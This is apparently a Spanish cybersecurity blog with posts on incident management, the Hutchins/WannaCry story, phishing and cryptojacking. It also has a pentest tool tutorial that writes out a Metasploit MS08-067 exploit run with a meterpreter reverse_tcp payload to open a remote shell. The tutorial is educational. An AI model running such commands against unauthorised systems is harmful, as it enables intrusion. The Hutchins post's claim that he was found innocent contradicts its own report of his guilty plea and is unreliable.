Seguridad Informática

📧 El correo que no viajaba más de 500 millas

2025-12-22T11:06:00.010-04:00

📧 El correo que no viajaba más de 500 millas

Una lección real sobre gestión de incidentes (ISO/IEC 27001 – 27002)

Un usuario abrió un ticket diciendo algo aparentemente absurdo:
No puedo enviar correos electrónicos a más de 500 millas de distancia
El administrador de sistemas pensó lo que muchos pensaríamos: “el correo no tiene distancia”.
Sin embargo, el usuario insistió… y tenía razón.

🔍 El incidente

Las pruebas confirmaron el problema:
Correos a servidores cercanos: ✅ entregados
Correos a servidores lejanos: ❌ fallaban
Días antes, el servidor de correo (Sendmail) había sido actualizado.
La nueva configuración por defecto redujo el timeout de conexión a 3 milisegundos.

⚡ Cuando la física entra en juego

Para establecer una conexión SMTP se requiere un handshake (ida y vuelta de la señal).

La señal en fibra óptica viaja a una velocidad finita (≈ velocidad de la luz).

En 3 ms, la señal solo puede recorrer ~900 km ida y vuelta.

Si el servidor destino estaba más lejos, no alcanzaba a responder antes del timeout.
Resultado: la conexión se cortaba.
👉 El servidor de correo estaba limitado por la velocidad de la luz.

🔗 Relación con ISO/IEC 27001 y 27002

Este caso es un ejemplo perfecto de gestión de incidentes, aunque no haya existido un ciberataque.

📌 Detección y reporte

ISO 27002 – Control 5.24
El incidente fue detectado gracias a un reporte de usuario, una fuente clave que nunca debe subestimarse.

📌 Evaluación del incidente

ISO 27002 – Control 5.25
Un evento que parecía trivial afectaba directamente la disponibilidad del servicio de correo.

📌 Análisis y respuesta

ISO 27002 – Control 5.26
La causa raíz no fue una falla de red ni un ataque, sino un cambio mal controlado en la configuración.

📌 Aprendizaje y mejora

ISO 27002 – Control 5.27
El verdadero valor del incidente está en lo aprendido:

Revisar parámetros críticos tras cambios

Realizar pruebas post-actualización

Documentar impactos no evidentes

🎯 Lección clave

No todos los incidentes de seguridad vienen de ataques. Algunos nacen de una mala configuración… y otros nos recuerdan que incluso la tecnología obedece a las leyes de la física.

La gestión de incidentes no consiste solo en restaurar servicios, sino en entender por qué fallaron y evitar que vuelva a ocurrir.

🔐 Ciberseguridad: un ecosistema, no una sola herramienta

2025-12-18T10:31:00.001-04:00

🔐 Ciberseguridad: un ecosistema, no una sola herramienta

Hoy la ciberseguridad dejó de ser únicamente un asunto técnico. Se ha convertido en un pilar estratégico que impacta directamente en la continuidad del negocio, la reputación y la confianza de clientes, usuarios y socios.

Uno de los errores más frecuentes en las organizaciones es creer que la seguridad se resuelve simplemente adquiriendo una herramienta.

La realidad es distinta.

La ciberseguridad moderna funciona como un ecosistema, donde múltiples dominios se integran y se complementan para ofrecer una protección efectiva y sostenible.

Entre los dominios más relevantes se encuentran:

☁️ Seguridad en la nube, para proteger entornos digitales críticos
💻 Seguridad de endpoints, que resguarda los dispositivos de los colaboradores
🌐 Seguridad de red, para controlar accesos y flujos de tráfico
🧑‍💼 Gestión de identidades (IAM), que define quién accede, a qué y en qué condiciones
🚨 Operaciones de seguridad (SOC), para detectar, analizar y responder a incidentes
🧩 Seguridad de aplicaciones, donde se ejecutan los procesos del negocio
🔐 Protección de datos, el activo más valioso de la organización
📊 Gobierno, Riesgo y Cumplimiento (GRC), que alinea la seguridad con la estrategia corporativa
🎓 Concientización de usuarios, porque las personas también forman parte de la defensa

💡 Mensaje clave:

➡️ Más herramientas no significan mayor seguridad.

➡️ La verdadera diferencia está en contar con una estrategia clara, visibilidad integral y personas capacitadas.

🌐🤖 La nueva frontera en Ciberseguridad: proteger la Inteligencia Artificial 🛡️

2025-08-27T19:30:00.006-04:00

La IA ya no es solo una herramienta… también puede ser un objetivo de ataque ⚠️.

Hoy hablamos de AI Security:

🔹 Prompt Injection: cuando logran manipular las instrucciones de un modelo.

🔹 Deepfakes: videos falsos cada vez más realistas.

🔹 Data Poisoning: contaminar los datos de entrenamiento para alterar los resultados.

👉 Por eso, la ciberseguridad ya no se limita a sistemas y redes: también debemos proteger la mente digital detrás de muchos procesos.

¿Estamos preparados para este nuevo reto? 🚀

#Ciberseguridad #IA #AIsecurity #Tecnología

Lecciones de Ciberseguridad: El Caso del Mayordomo que Traicionó al Papa

2025-04-26T10:45:00.007-04:00

El Vaticano falló en implementar un enfoque integral de seguridad basado en el control de accesos mínimos, monitoreo continuo, protección de datos críticos y gestión de amenazas internas. La confianza personal sin respaldo de controles técnicos adecuados permitió la traición y la filtración.

1. Fallo en el control de accesos internos (IAM - Gestión de Identidades y Accesos):

El mayordomo tenía acceso privilegiado a documentos confidenciales del Papa y del Vaticano. No existió una correcta separación de funciones ni limitación de privilegios (principio de “mínimo privilegio”).

Fallo: El acceso a información crítica no fue restringido ni monitorizado adecuadamente.

2. Fallo en la protección de información sensible:

No se aplicaron medidas de protección de datos (cifrado, tokenización o resguardo físico) que evitaran el robo o exfiltración de documentos.

Fallo: La información crítica estaba disponible en formatos fácilmente copiables o trasladables.

3. Falta de monitoreo y detección de actividades anómalas:

No había un sistema de auditoría o detección temprana de movimientos sospechosos (como copias de documentos fuera de horario, accesos inusuales, etc.).

Fallo: No existió una supervisión activa del comportamiento del personal interno.

4. Fallo en la gestión de la confianza y evaluación de riesgos internos (Insider Threat Management):

No se identificó a tiempo que un miembro cercano (el mayordomo) representaba un riesgo interno. No hubo un control o seguimiento de comportamientos que pudieran indicar deslealtad o riesgo de fuga de información.

Fallo: Subestimación de la amenaza interna.

5. Falta de políticas claras y protocolos de seguridad:

Es probable que no existieran políticas estrictas sobre el manejo, acceso, custodia y destrucción de documentos secretos o que no se aplicaran controles de cumplimiento.

Fallo: Ausencia o debilidad en los marcos normativos internos de seguridad.

Biggest Mysteries to be Solved: A Personal Take 🕵️‍♀️✨

2024-12-03T10:08:00.001-04:00

Los mayores misterios por resolver: Una perspectiva personal 🕵️‍♀️✨

Los misterios siempre han cautivado la curiosidad humana. Como profesional en ciberseguridad, encuentro una conexión especial entre los enigmas históricos sin resolver y los desafíos de mi campo. Ambos requieren pensamiento analítico, habilidad para identificar patrones y una curiosidad insaciable por descubrir la verdad. Estos son algunos de los enigmas históricos más intrigantes que resuenan profundamente conmigo:

1. La identidad de Jack el Destripador 🩸🔍
La historia de Jack el Destripador ejemplifica el desafío de reconstruir evidencia fragmentada. En ciberseguridad, al igual que en las investigaciones históricas, a menudo se trabaja con datos incompletos, tratando de comprender la identidad o los motivos de un escurridizo "atacante".

2. La tumba perdida de Cleopatra 🏺👑
Este misterio encarna el atractivo del descubrimiento. En mi carrera, encontrar vulnerabilidades o riesgos ocultos en los sistemas se siente como buscar la tumba de Cleopatra: un proceso lleno de anticipación y emoción intelectual.

3. El manuscrito Voynich 📜🔒
Como ingeniera en seguridad de la información, descifrar mensajes encriptados o entender significados ocultos se asemeja al esfuerzo por desbloquear los secretos de este enigmático texto. El misterio de su propósito y origen refleja los desafíos de descifrar las amenazas cibernéticas modernas.

4. La señal “Wow!” 🛸📡
La búsqueda de inteligencia extraterrestre a través de la señal “Wow!” me recuerda la detección de anomalías en ciberseguridad. Ambas implican identificar patrones en lo que parece ser ruido aleatorio, con la esperanza de descubrir algo extraordinario.

Por qué estos misterios me fascinan 💡🔎

Los misterios, sean históricos o técnicos, desafían nuestra comprensión del mundo. Nos impulsan a pensar de manera crítica, a colaborar y a innovar. Mi pasión por desentrañar estos enigmas se alinea perfectamente con mi trabajo en ciberseguridad, donde están en juego grandes riesgos y la búsqueda de respuestas es implacable.

Creo que resolver estos misterios —o al menos intentarlo— nos enseña resiliencia y creatividad. No se trata solo de encontrar respuestas, sino del viaje de exploración y las lecciones aprendidas en el camino.

Combinación de ciberseguridad e inteligencia artificial (IA)

2023-02-21T19:31:00.006-04:00

En los últimos años, la combinación de ciberseguridad e inteligencia artificial (IA) se ha convertido en una poderosa herramienta para ayudar a las organizaciones a proteger sus sistemas y datos de las ciberamenazas. Estas son algunas de las formas clave en que la IA se está utilizando para mejorar la ciberseguridad:

1. Detección de amenazas: los algoritmos de IA pueden analizar grandes cantidades de datos de una variedad de fuentes para identificar amenazas potenciales. Esto incluye analizar el tráfico de la red, los archivos de registro y el comportamiento del usuario para identificar anomalías que puedan indicar una brecha de seguridad.

2. Respuesta a incidentes: Los sistemas de respuesta a incidentes impulsados por IA pueden ayudar a las organizaciones a responder de manera rápida y efectiva al automatizar la identificación de la amenaza, priorizar la respuesta e incluso sugerir acciones de remediación.

3. Gestión de identidades y accesos: Los sistemas de administración de acceso e identidad impulsados por IA pueden ayudar a las organizaciones a detectar y prevenir el acceso no autorizado mediante el análisis del comportamiento del usuario y la identificación de amenazas potenciales.

4. Detección de malware: la IA también se puede utilizar para detectar y prevenir ataques de malware. Al analizar el comportamiento de los archivos y las aplicaciones, los algoritmos de IA pueden identificar firmas de malware y evitar su ejecución.

5. Evaluación de vulnerabilidades: los sistemas de evaluación de vulnerabilidades impulsados por IA pueden escanear los sistemas de TI para identificar vulnerabilidades y priorizarlas en función del impacto potencial. Al automatizar el proceso de evaluación de vulnerabilidades, las organizaciones pueden ahorrar tiempo y mejorar la precisión de sus evaluaciones.

Sin embargo, si bien la IA tiene el potencial de mejorar significativamente la ciberseguridad, también plantea algunos desafíos. Uno de los principales desafíos es que los sistemas de ciberseguridad impulsados por IA pueden ser susceptibles de atacarse a sí mismos. Los piratas informáticos pueden usar algoritmos de IA para generar datos falsos realistas que pueden engañar a los sistemas impulsados por IA para que piensen que no se está produciendo un ataque. Además, los sistemas de IA son tan buenos como los datos con los que están entrenados. Si los datos están sesgados o incompletos, es posible que el sistema de IA no pueda detectar todas las amenazas.

Para abordar estos desafíos, las organizaciones deben asegurarse de que sus sistemas de ciberseguridad impulsados por IA se actualicen y capaciten regularmente en una amplia gama de datos. Además, es importante implementar múltiples capas de seguridad para reducir el riesgo de que los sistemas impulsados por IA se vean comprometidos.

Autor: Lucas Rolan

#ciberseguridad #inteligenciaartificial #ti #malware #algoritmos

Historia de Marcus Hutchins

2023-02-13T12:55:00.010-04:00

¿Conoces la historia de Marcus Hutchins?

El hacker que salvo el Internet

El 12 de mayo de 2017, los ordenadores fallaron en un hospital público de Londres, en las pantallas aparecía un mensaje: "Tus archivos han sido encriptados", y se exigía el pago de 300 dólares en bitcoins para desbloquearlos, el mundo se enfrentaba a uno de los ataques cibernéticos más destructivos para ese momento, el ransomware conocido como WannaCry afectaba hospitales, oficinas de gobierno, colegios y empresas paralizando internet y secuestrando ordenadores en más de 150 países.

En medio del caos y sin haber encontrado una manera de eliminar el ransomware que se esparcía rápidamente por todo el mundo, un héroe conocido como MalwareTech Marcus Hutchins encontraba una solución que terminaba con la propagación del malware, el hacker de solo 22 años salvó Internet desde Inglaterra, convirtiendose en un heroe que ahorró miles de millones a empresas de todo el mundo.

Marcus llevaba una doble vida como empleado de una empresa de ciberseguridad y hacker a sueldo de ladrones de bancos, es por ello que semanas más tarde el héroe fue arrestado en los Estados Unidos por el FBI, esto nos muestra que en mundo de la ciberseguridad es muy fácil cruzar la línea de la legalidad.

Su arrestado ocurrió en la ciudad de Las Vegas, donde ofreció charlas acerca de su experiencia desactivando WannaCry, el FBI tenia evidencias de prácticas de hacking en masa realizadas entre 2014 y 2015, que él era responsable del desarrollo del troyano bancario 'Kronos', el cual fue utilizado para robar cuentas de banco, códigos PIN y credenciales para realizar fraudes, así como para modificar los portales de los bancos desde cualquier navegador, además, se le acusa de "conspiración criminal" por vender el troyano por 3.000 dólares en webs ilícitas.

Lo llevaron a una sala de interrogatorios y le preguntaron por Kronos. Confesó casi de inmediato. El fiscal lo acusó de diez delitos relacionados con ese programa. Podían caerle diez años. Pasó un par de semanas detenido hasta que sus admiradores reunieron dinero para pagar su fianza. Aleccionado por su letrado, se declaró inocente. Siguió un tira y afloja de meses con las autoridades. Si colaboraba y revelaba la identidad de otros hackers, como Vinny, le ofrecían retirar los cargos. Pero Hutchins no podía colaborar. No los conocía, solo sus seudónimos. No hubo trato y fue a juicio. «Como sabéis, me he declarado culpable de dos cargos (de los diez iniciales) relacionados con la creación de malware años antes de empezar mi carrera en ciberseguridad. Lamento estas acciones y acepto la responsabilidad por mis errores», publicó en Twitter.

El juez Joseph Stadtmueller antes de dictar sentencia, dijo: «Llevo más de 30 años juzgando y he sentenciado a 2200 personas. Pero ninguna como usted. Y he visto de todo. Aprecio el hecho de se pueda ver lo innoble de su conducta contrapesado por la acción de un héroe». Y añadió: «Si no tomamos las medidas apropiadas para proteger la seguridad de estas maravillosas tecnologías en las que confiamos día a día, el potencial para el desastre es absoluto. Hacen falta individuos como usted que nos den las soluciones».

Hutchins fue declarado inocente. El juez estimó que ya había cumplido su deuda con la sociedad con el tiempo pasado en prisión preventiva, más un año en libertad condicional, que se cumple ahora. A final de mes podrá regresar a Reino Unido, rehacer su vida.

Sigue trabajando como analista para Kryptos Logic. En un tuit ha señalado: «Existe la idea errónea de que para ser un experto en ciberseguridad antes hay que darse un paseo por el lado oscuro. No es cierto. Puedes aprender todo lo que necesitas legalmente. Quédate en el lado bueno».

Seguridad de la Información

2021-03-19T10:56:00.005-04:00

¿Qué es seguridad de la información?

"Es la preservación de la confidencialidad, integridad y disponibilidad de la información" (Norma ISO/IEC 27000)

"Se refiere a los procesos y metodologías las cuáles son diseñadas e implementadas para proteger la información electrónica, documental o cualquier otra forma de información". (SANS Institute)

¿Que es un #Ingenier@ de #Ciberseguridad?

2018-08-22T11:16:00.002-04:00

¿Que es un Ingeniero de #Ciberseguridad?

Es un profesional cuya principal labor es detectar fallos de seguridad y habilitar mecanismos para evitar los posibles ataques a esos puntos vulnerables, por lo tanto su labor es compleja, ya que involucra un proceso en donde se realizan distintos tipos de tareas para identifican las vulnerabilidades que podrían explotarse y los daños que podría causar un atacante. En otras palabras, se realiza un proceso de hacking ético para identificar qué incidentes podrían ocurrir antes de que sucedan y, posteriormente, reparar o mejorar el sistema, de tal forma que se eviten estos ataques.

¿Qué es la Ciberseguridad?

La ciberseguridad también conocida como seguridad informática o seguridad de tecnologías de la información, es el área que se enfoca en la protección de la infraestructura tecnológica y en especialmente a la información contenida en esta.

¿Cuales son las aptitudes principales de su personalidad?

Polifacético o Polifacética: Es apto para varias disciplinas, que se suman a sus conocimientos en ética hacker, como es la programación, las metodologías, la documentación, entre otros, por ello debe tener capacidad para sobresalir en varias tareas o campos y para ejecutar muchas actividades conectadas entre sí. No obstante, esos aprendizajes suelen venir una vez que se conocen y se saben utilizar muchas herramientas seguridad que son parte del proceso, entre ellas podemos mencionar los conocimientos que se adquiere en seguridad en redes (Firewalls, Routers, IPS, etc), se seguridad de plataformas (Windows, Linux, Unix) y Seguridad en Bases de Datos (SQL, DB2, Oracle), entre otras.

Ingenioso o Ingeniosa: Buscar soluciones tangible o constructivas en base a un plan estratégico y de riesgo que puede ser ejecutado. Muchas veces tienes que crear algo a partir de la nada. Un objetivo de ataque comienzan en su mente. Interpreta y pone su inteligencia para ofrecer un informe que realmente brinde valor a su cliente

Actitud analítica: Necesitan una mente analítica, capaz de ver y analizar hasta el más mínimo detalle y con ello proponer soluciones. Una mente analítica, lógica y con razonamiento debe sobreponerse ante una mente idealista cuando hablamos de un ataque.

Trabajador: La actividad y el dinamismo son parte de la Ingeniería en Seguridad. Es una carrera que exige mucho mental y físicamente.

Colaboración: "Acción y efecto de colaborar" No es necesario que tengas grandes habilidades sociales, El aprendizaje colaborativo es uno de los componentes esenciales, actualmente es necesario trabajar en equipo, con integración y comunicación

Detallista: Debe ser meticuloso, el más mínimo error causaría que algo colapse.

Se toma en serio la educación: La tecnología como herramienta para la Ingeniería siempre avanza.

¿Que herramientas utilizan un ingeniero de ciberseguridad?

NMAP: Es una herramienta de escaneo de redes que permite identificar qué servicios se están ejecutando en un dispositivo remoto, así como la identificación de equipos activos, sistemas operativos en el equipo remoto, existencia de filtros o firewalls, entre otros.

En palabras sencillas, cuando se va a atacar un servidor o dispositivo, el atacante podrá realizar distintas arremetidas en función del servicio: no es lo mismo dañar un servidor web, un servidor de base de datos o un router perimetral. Por lo tanto, en cualquier despliegue, el primer paso será identificar los servicios en la infraestructura, para decidir cómo avanzar y, considerando que en una prueba de penetración se “imitan” los pasos de un atacante, también se iniciará de la misma manera.

Nmap es una herramienta de línea de comandos (existen algunas interfaces gráficas pero, personalmente, no las recomiendo, aunque es una cuestión de gustos) donde se debe indicar cuál será el o los objetivos y la serie de parámetros que afectarán la forma en que se ejecuten las pruebas y los resultados que se obtienen. Puede instalarse tanto en Linux, Windows, Mac u otros sistemas operativos.

En su forma tradicional, una línea de comando sería la siguiente:

> nmap 172.16.1.1

En donde nmap es el comando en sí mismo y 172.16.1.1 es el objetivo (que también puede ser indicado con un nombre de dominio). La respuesta a estos comandos será un listado de los puertos abiertos o cerrados en dicha dirección. La ejecución sin parámetros ejecuta un escaneo sencillo a los 1000 puertos más comunes (véase que en la imagen se muestra uno abierto y 999 cerrados), realizando anteriormente un ping para ver si el equipo está vivo (si el equipo no responde al ping, no se realizará el test de los puertos).

Cuando agregas parámetros puedes obtener mejores resultados. Algunos parámetros comunes para tener en cuenta son:

[-iL] puedes indicar una lista de equipos o redes a escanear. > nmap –iL hosts.txt

[-sP] solo escanea con un ping. Es una buena forma de ver cuántas direcciones IP se pueden checar. Una vez que se tienen enlistadas, se podrá ir solo con las que están vivas.

[-P0] es la forma de omitir el ping e ir directo al escaneo de puertos. Muchos sistemas no responden el ping como método de seguridad, por lo que, escanearlos de todas formas, también puede ser útil en entornos más reales (no es necesario para los entornos de aprendizaje inicial).

[-p] lista los puertos que se desean escanear. > nmap –iL hosts.txt –p 22,25,80,445

[-sV] intenta determinar la versión del servicio en el objetivo.

[-O] informa el sistema operativo en el objetivo.

Una vez ejecutado Nmap, ya se conocen cuáles son los servicios (al menos los identificados) que se están ejecutando en el blanco de la prueba de penetración. Ahora ya se puede pasar a las siguientes etapas, en donde se utilizará esta información para comenzar la búsqueda de vulnerabilidades en la infraestructura y en los servicios identificados.

Ficha técnica

Herramienta: Nmap

Sitio web: http://nmap.org/

Cómo empezar: instalarlo, ejecutar un comando sencillo hacia una dirección IP y luego probar agregando parámetros (nmap --help puede brindar más información) o ejecutar para múltiples direcciones IP (que deben ser indicadas en un archivo TXT).

NESSUS: Es un scanner de vulnerabilidades en los servicios, posee una interfaz gráfica, muy completa e intuitiva, es una forma sencilla de comenzar a probar esta herramienta. Nessus posee una extensa base de datos de vulnerabilidades conocidas en distintos servicios y, por cada una de éstas, posee plugins que se ejecutan para identificar si la vulnerabilidad existe (o no) en determinado equipo objetivo. En resumen, al ejecutarse Nessus sin parámetros específicos, se probarán miles de vulnerabilidades y se obtendrá como resultado un listado de las vulnerabilidades que fueron identificadas.

La lógica de Nessus es similar a Nmap: hay que indicar el objetivo, en este caso la o las direcciones IP y los parámetros. Estos permiten limitar el campo de búsqueda, especialmente si en una etapa anterior se identificaron los servicios: no tiene sentido buscar vulnerabilidades conocidas en Linux en un equipo que tiene instalado Windows.

Ficha técnica

Herramienta: Nessus

Sitio web: http://www.tenable.com/products/nessus/

Cómo empezar: Si tienes Windows, instalarlo ahí por interfaz gráfica es muy sencillo, funciona para conocerlo por primera vez. Recomiendo buscar el listado de plugins y ejecutar pruebas limitando solo a determinados servicios.

Más información: Un listado completo de plugins está disponible en el sitio web, la lectura de las descripciones es muy útil para aprender más sobre vulnerabilidades en diversas plataformas (http://www.tenable.com/plugins/index.php?view=all).

METASPLOIT FRAMEWORK: Es la herramienta ideal para hacer estas pruebas. Mientras Nessus posee una base de datos de vulnerabilidades, Metasploit posee una base de exploits que podrían aprovecharlas. En otras palabras, en lugar de revisar si hay una vulnerabilidad en un equipo remoto, directamente se intenta la ejecución de un exploit y se simulan las consecuencias posteriores, en caso de que éste se ejecutara con éxito.

Al igual que Nessus, su versión de línea de comandos, msfconsole, es la tradicional, incluso recomendable para la automatización. Sin embargo, su interfaz gráfica es muy conveniente para dar los primeros pasos y tener una mayor comprensión.

Si quieres probar la línea de comandos puedes hacer las primeras pruebas. En Windows puedes abrirla directamente desde el Menú de inicio como “Metasploit Console”. En Linux, tan solo puedes ejecutar un simple comando:

> sudo msfpro

Una vez que estás en la consola, verás que cambia el prompt:

msf-pro >

Hay una serie de comandos sencillos para dar los primeros pasos. Search, use, show, set y exploit son probablemente los mejores. Probaremos explotar una de las vulnerabilidades más famosas en Windows, la MS 08-067 (para ver el boletín de la vulnerabilidad, clic aquí), una vulnerabilidad crítica descubierta en 2008 que permitía ejecución remota de código.

Si en un paso anterior (con Nessus) encontraste que el sistema posee dicha vulnerabilidad (con Nmap podrías haber encontrado que estás lidiando con una máquina Windows), sería lógico con search encontrar el exploit a utilizar.

msf-pro > search exploits 08-067

Entre los resultados, lo más importante es que podrás encontrar la ruta del exploit y luego con use podrás decidir utilizarlo (sí, asombroso):

msf-pro > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) >

El comando show mostrará las alternativas para ejecutar el exploit.

msf exploit(ms08_067_netapi) > show options

Luego, se podrá utilizar el comando set para configurar el exploit antes de la ejecución. En este caso, definiremos el local host (nuestra dirección IP), al host remoto (la dirección IP de destino, donde se supone que ya sabemos existe la vulnerabilidad) y el payload (acción a ejecutar, en este caso usaremos reverse_tcp que nos dará una consola remota en el equipo).

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST [192.168.0.1]

msf exploit(ms08_067_netapi) > set RHOST [192.168.0.10]

Finalmente, solo debes ejecutar “exploit”.

msf exploit(ms08_067_netapi) > exploit

Si pudiste hacer estos pasos correctamente, podrás ver una consola remota en el equipo Windows y podrás testearla con comandos regulares de consola (ipconfig, dir, etc.).

Ficha técnica

Herramienta: Metasploit

Sitio web: http://www.metasploit.com/

Dónde empezar: una vez instalado, haz la prueba con alguna vulnerabilidad que permita el uso de una consola meterpreter remota, son sencillas de probar si fueron exitosas. Hay que tener precaución con las vulnerabilidades de denegación de servicio.

Más información: Existe un documento oficial completo para dar los primeros pasos en Metasploit Framework, muy recomendable, “Metasploit Community Getting Started Guide".

KALI LINUX (BACKTRACK): Es una distribución de Linux diseñada exclusivamente para Penetration Testing. Las herramientas antes descritas (Nmap, Nessus, Metasploit) están disponibles y, no solo eso, también hay muchas más herramientas para continuar practicando. Por ejemplo, Kali (antes conocida como Backtrack) es una distribución que posee todo tipo de herramientas preinstaladas que sirven para realizar Penetration Testing.

Kali Linux puede ser descargada como imagen ISO o directamente para VMWare. Una vez que inicias un sistema Kali Linux, verás un menú muy extenso con más de 300 herramientas para pentesters. Nmap y Metasploit Framework están incluidos en esta lista, entre otros.

Imagen 5. Menú de Kali Linux (voiceofgreyhat.com)

Parrot Security OS es una distribución GNU/Linux especializada en la seguridad informática y orientada por tanto a realizar labores de pentesting, informática forense, hacer ingeniería inversa, navegar de forma anónima, y practicar criptografía.

Acunetix: Es un escáner de vulnerabilidades de aplicaciones web. La herramienta está diseñada para encontrar agujeros de seguridad en las aplicaciones web de la organización que un atacante podría aprovechar para obtener acceso a los sistemas y datos.

Acunetix comprueba los sistemas en busca de múltiples vulnerabilidades incluyendo:

SQL injection

Cross Site Scripting

Passwords débiles

Acunetix puede utilizarse para realizar escaneos de vulnerabilidades en aplicaciones web y para ejecutar pruebas de acceso frente a los problemas identificados. La herramienta provee sugerencias para mitigar las vulnerabilidades identificadas y puede utilizarse para incrementar la seguridad de servidores web o de las aplicaciones que se analizan. Mas información:

http://www.acunetix.com/

Nexpose es una herramienta que permite ejecutar diferentes tipos de escaneos en búsqueda de vulnerabilidades en un host o red, permite la definición de determinadas opciones que nos permiten acceder a un escaneo mucho mas preciso con el uso de filtros por puertos, máquinas, segmentos de red, protocolos, etc.

El procedimiento de instalación es muy simple, solamente basta con descargar el software y navegar por la estructura de directorios hasta llegar al directorio nexpose/nsc, una vez allí ejecutar el fichero ./nsc.sh, esto nos permitira utilizar nexpose desde la interfaz web en la ruta https://localhost:3780/

Aunque resulta muy sencillo, aun hay un tema por cubrir, se trata de la base de datos SQL requerida, ya que el servidor no arranca correctamente si se encuentra una base de datos postgresql instalada y escuchando por el puerto 5432, por lo tanto es posible que sea necesario cambiar los ficheros de propiedades para especificar un valor diferente de puerto, de esta forma evitaremos conflictos:

nsc/conf/nsc.xml

editar la linea de conexión por:

dbms=”postgresql” db=”//127.0.0.1:5333/nexpose”>

Posteriormente en el fichero:

nsc/nxpgsql/nxpdata/postgresql.conf

añadir:

port=5333

Con estas indicaciones el servidor debería poder iniciarse sin problemas.

después de instalarlo es posible que pida una clave para activar la licencia, esta clave debe ser solicitada en el sitio oficial de Nexpose.

Phishing scam: "Recomendación lucrativa de empleo" de Recursos Humanos

2018-08-16T18:44:00.002-04:00

Una estafa de phishing, con el tema ""Recomendación lucrativa de empleo". A continuación un ejemplo de mensaje fraudulento

El ejemplo anterior nos dice, "Su perfil ha sido recomendado para una oportunidad de empleo lucrativo. Para obtener más información" y le pide al destinatario "envíe amablemente su currículum actualizado al correo electrónico: hr@accentureplacement.com".

Puede haber otras variantes de este mensaje, que parecen provenir de diferentes empresa. Esté atento a correos electrónicos similares.

NO responda si recibe este mensaje. ¡Elimina este correo electrónico de inmediato! NO proviene de una fuente que dice ser. Este correo electrónico es un intento fraudulento de obtener acceso a su información personal.

Si ha recibido un correo electrónico de phishing o sospecha que lo tiene, infórmelo, enviando el mensaje como un archivo adjunto a phishing@mcgill.ca

Ataque de #phishing que uso a #GoogleDocs y #Gmail como el anzuelo

2018-08-05T11:21:00.003-04:00

Google en el 2017 fue victima de uno de los ataques de phishing más elaborados que se han conocido, logrando reenviarse a millones de personas y provocando una histeria colectiva que tardó varias horas en detenerse, hasta que Google bloqueó el truco que se usaba

El ataque de phishing consistio:

La victima recibía correos electrónicos de contactos conocidos "anzuelo" con un botón similar al que Gmail te muestra cuando tienes que abrir un archivo en Google Drive. Cuando la victima pulsaba sobre el botón, se abría una página de Google autentica que te pedía que dieras permisos a una aplicación llamada “Google Drive”, solo que esa aplicación no es de Google, sino una que alguien había creado para acceder a tu agenda de Gmail y reenviarles a todos tus contactos el anzuelo.

¿Como reacciono Google?

Google bloqueó la aplicación maliciosa que provocó este pánico, tomado acciones para proteger a los usuarios contra el correo electrónico Google Docs y desactivado las cuentas que generaban el anzuelo, eliminado las páginas falsas y publicado actualizaciones a través de Navegación Segura.

Aprendizaje que deja el ataque

El peligro no fue solo el correo electrónico que seguramente logro recolectar millones de cuentas de correos electrónicos activos para cualquier tipo de ataque o campaña de spam. El verdadero peligro es que se demostró que este ataque de phishing es efectivo y cualquiera podría usar la misma técnica para engañar a alguien y acceder a su correo electrónico.

Moraleja: Aunque un correo venga de un contacto conocido, redobla tu escepticismo antes de abrir cualquier archivo o enlace.

Criptosecuestro ¿Qué es? y ¿Qué no es? ¿Cómo puedo protegerme?

2018-07-29T16:10:00.000-04:00

¿Qué es Criptosecuestro?

Un minero web (webminer) es un código que se ejecuta en un sitio de Internet específico y Criptosecuestro el poder de procesamiento del equipo de los usuarios que lo visitan para minar criptomonedas. Esto lo hace utilizando el lenguaje JavaScript en aquellos navegadores que lo tienen activado de manera predeterminada; característica que resulta común en la mayoría de los exploradores que se utilizan en la actualidad.

¿Qué es no Criptosecuestro?

Es importante que no se confunda un minero web con la minería de criptomonedas en la nube (Cloud Mining), un servicio que ofrecen compañías o mineros con alto poder de procesamiento para alquilarlo a usuarios que pagan un contrato y obtienen una ganancia determinada por su afiliación. La diferencia entre un minero web y un servicio de minería en la nube radica en que el primero no provee de ganancias al usuario que visita la página web que lo posee y generalmente el usuario no se entera de que hay un minero alojado en su navegador. El funcionamiento de ambas modalidades para minar es completamente distinto.

¿Como puedo proteger mi dispositivo?

Es posible que se piense que con tan sólo cerrar el explorador web puede acabar con el secuestro del equipo. No obstante, es preciso señalar que en el mes de diciembre fue descubierto un minero que podía seguir ejecutándose aún con el navegador cerrado, por medio de una ventana oculta en el escritorio justo debajo de la barra de tareas.

Afortunadamente, hay múltiples formas de evitar que nuestros equipos sean utilizados con estos fines. En primer lugar, es muy importante mantener todos los navegadores actualizados, ya que algunos, como Opera, han integrado extensiones que bloquean la presencia de los mineros web en los equipos, incluyendo los dispositivos móviles.

Los antivirus que integran herramientas anti-malware y anti-spyware son muy útiles en el reforzamiento de la seguridad del equipo y algunos de ellos se consiguen de manera gratuita. Con la popularización de los mineros web, surgieron múltiples extensiones de navegador que detectan y bloquean la utilización de los mineros: una de las más populares es conocida como No Coin. También puedes utilizar bloqueadores de anuncios como AdBlock, que evitan la reproducción del malvertising.

Puedes optar, de igual forma, por utilizar la exploración manual de los sitios para ver si se encuentran minando criptomonedas o no, con la utilidad “¿quién está minando?”, donde podrás ingresar manualmente la dirección de un sitio web específico para saber si tiene un código de minería incrustado. Si no deseas hacerlo manualmente, también cuentas con un test que te permite saber si una de las páginas que estás visitando tiene algún minero web activado.

¿Qué es la gestión unificada de amenazas (UTM)?

2018-07-29T15:44:00.000-04:00

La gestión unificada de amenazas, que comúnmente se abrevia como UTM (Unified Threat Management), se refiere un único producto de seguridad que ofrece varias funciones de protección en un solo punto en la red, en el mercado actual este tipo dispositivo esta enfocado a la pequeña y mediana empresa, se encuentran distribuidas en múltiples sedes.

Un producto UTM generalmente incluye funciones como antivirus, antispyware, antispam, firewall de red, prevención y detección de intrusiones, filtrado de contenido y prevención de fugas. Algunas unidades también ofrecen servicios como enrutamiento remoto, traducción de direcciones de red (NAT, network address translation) y compatibilidad para redes privadas virtuales (VPN, virtual private network).

Ventajas UTM

Ofrece una solución de seguridad sencillez. Las empresas que utilizan servicios de proveedores o productos diferentes para cada tarea de seguridad ahora pueden reunirlos todos en una sola solución, con asistencia de un único equipo o segmento de TI, y ejecutarlos desde una sola consola.
